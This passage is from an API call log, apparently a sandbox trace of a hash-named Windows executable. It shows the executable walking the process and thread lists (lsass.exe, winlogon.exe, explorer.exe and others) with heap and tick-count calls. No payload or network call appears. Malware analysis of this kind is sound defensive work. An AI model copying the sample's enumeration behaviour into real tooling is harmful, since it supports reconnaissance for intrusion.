th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.771] GetCurrentThreadId () returned 0x5d8 [0186.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.772] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0186.773] GetTickCount () returned 0xba58 [0186.773] GetCurrentThreadId () returned 0x5d8 [0186.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.774] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0186.775] GetTickCount () returned 0xba67 [0186.775] GetCurrentThreadId () returned 0x5d8 [0186.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.776] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.777] GetTickCount () returned 0xba67 [0186.777] GetCurrentThreadId () returned 0x5d8 [0186.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.778] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0186.779] GetTickCount () returned 0xba67 [0186.779] GetCurrentThreadId () returned 0x5d8 [0186.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.780] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x15c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.781] GetTickCount () returned 0xba67 [0186.781] GetCurrentThreadId () returned 0x5d8 [0186.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.782] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x15c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0186.783] GetTickCount () returned 0xba67 [0186.783] GetCurrentThreadId () returned 0x5d8 [0186.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.783] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x164, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0186.785] GetTickCount () returned 0xba67 [0186.785] GetCurrentThreadId () returned 0x5d8 [0186.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.785] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x164, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0186.787] GetTickCount () returned 0xba67 [0186.787] GetCurrentThreadId () returned 0x5d8 [0186.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.787] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x164, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0186.788] GetTickCount () returned 0xba67 [0186.788] GetCurrentThreadId () returned 0x5d8 [0186.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.789] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.790] GetTickCount () returned 0xba77 [0186.790] GetCurrentThreadId () returned 0x5d8 [0186.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.790] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.792] GetTickCount () returned 0xba77 [0186.792] GetCurrentThreadId () returned 0x5d8 [0186.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.792] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.793] GetTickCount () returned 0xba77 [0186.793] GetCurrentThreadId () returned 0x5d8 [0186.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.794] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.795] GetTickCount () returned 0xba77 [0186.795] GetCurrentThreadId () returned 0x5d8 [0186.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.796] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.797] GetTickCount () returned 0xba77 [0186.797] GetCurrentThreadId () returned 0x5d8 [0186.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.797] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.799] GetTickCount () returned 0xba77 [0186.799] GetCurrentThreadId () returned 0x5d8 [0186.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.799] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.801] GetTickCount () returned 0xba77 [0186.801] GetCurrentThreadId () returned 0x5d8 [0186.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.801] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.805] GetTickCount () returned 0xba77 [0186.805] GetCurrentThreadId () returned 0x5d8 [0186.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.805] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0186.807] GetTickCount () returned 0xba77 [0186.807] GetCurrentThreadId () returned 0x5d8 [0186.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.807] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.809] GetTickCount () returned 0xba87 [0186.809] GetCurrentThreadId () returned 0x5d8 [0186.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.810] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0186.811] GetTickCount () returned 0xba87 [0186.811] GetCurrentThreadId () returned 0x5d8 [0186.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.812] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x534, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mscorsvw.exe")) returned 1 [0186.813] GetTickCount () returned 0xba87 [0186.813] GetCurrentThreadId () returned 0x5d8 [0186.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.814] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mscorsvw.exe")) returned 1 [0186.815] GetTickCount () returned 0xba87 [0186.815] GetCurrentThreadId () returned 0x5d8 [0186.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.816] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x198, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0186.818] GetTickCount () returned 0xba87 [0186.818] GetCurrentThreadId () returned 0x5d8 [0186.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.819] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0186.821] GetTickCount () returned 0xba96 [0186.821] GetCurrentThreadId () returned 0x5d8 [0186.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.822] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x6dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.824] GetTickCount () returned 0xba96 [0186.824] GetCurrentThreadId () returned 0x5d8 [0186.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.825] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x768, pcPriClassBase=13, dwFlags=0x0, szExeFile="0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 1 [0186.826] GetTickCount () returned 0xba96 [0186.826] GetCurrentThreadId () returned 0x5d8 [0186.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.827] Process32Next (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x768, pcPriClassBase=13, dwFlags=0x0, szExeFile="0336cc8aff0e4974ede9??????????????????????????????????")) returned 0 [0186.828] GetTickCount () returned 0xba96 [0186.828] Thread32First (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.829] GetCurrentThreadId () returned 0x5d8 [0186.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.829] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.830] GetTickCount () returned 0xba96 [0186.830] GetCurrentThreadId () returned 0x5d8 [0186.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.831] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.832] GetTickCount () returned 0xba96 [0186.832] GetCurrentThreadId () returned 0x5d8 [0186.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.832] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.833] GetTickCount () returned 0xba96 [0186.833] GetCurrentThreadId () returned 0x5d8 [0186.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.833] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.834] GetTickCount () returned 0xba96 [0186.834] GetCurrentThreadId () returned 0x5d8 [0186.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.835] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.836] GetTickCount () returned 0xba96 [0186.836] GetCurrentThreadId () returned 0x5d8 [0186.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.836] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.837] GetTickCount () returned 0xbaa6 [0186.837] GetCurrentThreadId () returned 0x5d8 [0186.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.837] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.838] GetTickCount () returned 0xbaa6 [0186.838] GetCurrentThreadId () returned 0x5d8 [0186.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.839] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.840] GetTickCount () returned 0xbaa6 [0186.840] GetCurrentThreadId () returned 0x5d8 [0186.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.840] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.841] GetTickCount () returned 0xbaa6 [0186.841] GetCurrentThreadId () returned 0x5d8 [0186.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.842] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.843] GetTickCount () returned 0xbaa6 [0186.843] GetCurrentThreadId () returned 0x5d8 [0186.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.843] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.844] GetTickCount () returned 0xbaa6 [0186.844] GetCurrentThreadId () returned 0x5d8 [0186.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.844] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.845] GetTickCount () returned 0xbaa6 [0186.846] GetCurrentThreadId () returned 0x5d8 [0186.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.846] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.847] GetTickCount () returned 0xbaa6 [0186.847] GetCurrentThreadId () returned 0x5d8 [0186.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.847] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.848] GetTickCount () returned 0xbaa6 [0186.848] GetCurrentThreadId () returned 0x5d8 [0186.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.849] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.850] GetTickCount () returned 0xbaa6 [0186.850] GetCurrentThreadId () returned 0x5d8 [0186.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.850] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.851] GetTickCount () returned 0xbaa6 [0186.851] GetCurrentThreadId () returned 0x5d8 [0186.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.851] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.853] GetTickCount () returned 0xbab5 [0186.853] GetCurrentThreadId () returned 0x5d8 [0186.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.854] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.855] GetTickCount () returned 0xbab5 [0186.855] GetCurrentThreadId () returned 0x5d8 [0186.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.856] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.857] GetTickCount () returned 0xbab5 [0186.857] GetCurrentThreadId () returned 0x5d8 [0186.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.857] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.858] GetTickCount () returned 0xbab5 [0186.858] GetCurrentThreadId () returned 0x5d8 [0186.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.859] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.860] GetTickCount () returned 0xbab5 [0186.860] GetCurrentThreadId () returned 0x5d8 [0186.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.860] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.861] GetTickCount () returned 0xbab5 [0186.861] GetCurrentThreadId () returned 0x5d8 [0186.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.861] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.862] GetTickCount () returned 0xbab5 [0186.862] GetCurrentThreadId () returned 0x5d8 [0186.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.863] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.864] GetTickCount () returned 0xbab5 [0186.864] GetCurrentThreadId () returned 0x5d8 [0186.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.864] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0186.865] GetTickCount () returned 0xbab5 [0186.865] GetCurrentThreadId () returned 0x5d8 [0186.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.866] HeapFree 